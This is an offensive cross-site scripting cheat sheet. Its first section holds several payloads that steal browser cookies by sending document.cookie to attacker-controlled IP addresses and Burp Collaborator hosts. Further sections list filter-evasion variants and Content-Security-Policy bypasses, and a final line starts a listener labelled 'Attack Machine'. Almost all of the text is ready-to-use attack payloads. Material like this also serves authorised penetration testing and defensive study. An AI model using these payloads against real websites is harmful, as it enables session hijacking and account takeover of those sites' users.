==============================================================================
[+] Steal Coockie XXS
==============================================================================
# Payload 1
<img src=x onerror=this.src='http://10.10.10.10/?c='+document.cookie>

# Payload 2
<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>

# Payload 3
<script>var i=new Image;i.src="http://10.10.10.10/?"+document.cookie;</script

# Payload 4
<img src=x onerror=this.src='http://10.10.10.10/?'+document.cookie;>

# Payload 5
<img src=x onerror="this.src='http://192.168.0.18:8888/?'+document.cookie; this.removeAttribute('onerror');">

# Payload 6
“--></sCrIpT><sCrIpT>document.location=“http://vvuim9b9t49t2kpvv7f4gq27kyqoed.burpcollaborator.net/?c=“+document.cookie;</sCrIpT>

# Payload 7
<script>img = new Image(); img.src = "http://192.168.1.44/a.php?"+document.cookie;</script>

# Payload 8
"><a%20href="https://xxxxxxxxxxxxxxx.burpcollaborator.net"><H1>Click%20here!</H1></a><input

# Payload 9
"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//

# Payload 10
--'`"><img src=x>kdskf${{7*7}}
# Payload 11
input "><script>prompt(1)</script>

==============================================================================
[+] Bypass XSS
==============================================================================
Alert('xss')
AlErt('xss')
Alert(/xss/.source)
Prompt('xss')
PrOmpT(444)
Confirm('xss')
CoNfiRm(123)
Window[/alert/.source](8)
WiNdoW[/alert/.source](8)
with(document)alert(cookie)
alert(document['cookie'])
AlErT(document['cookie'])
alert(document[/cookie/.source])
AlErT(document[/cookie/.source])
alert(document[/coo/.source/kie/.source])
<svg/onload=alert(1)>
<svg/onload=AleRt(1)>
<video src=x onerror=alert(1);>
<video src=x onerror=AlErt(1);>
<audio src=x onerror=alert(1);>
<audio src=x onerror=AlErt(1);>
Data:text/html;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==

==============================================================================
[+] Bypass Content-security-policy header XSS
==============================================================================
# https://medium.com/@bhavesh_thakur/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
# 1. 
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

# 2.
<object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

# 3.
<script src="/user_upload/mypic.png.js"></script>

# 4.
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>


# Attack Machine
sudo python -m SimpleHTTPServer 80
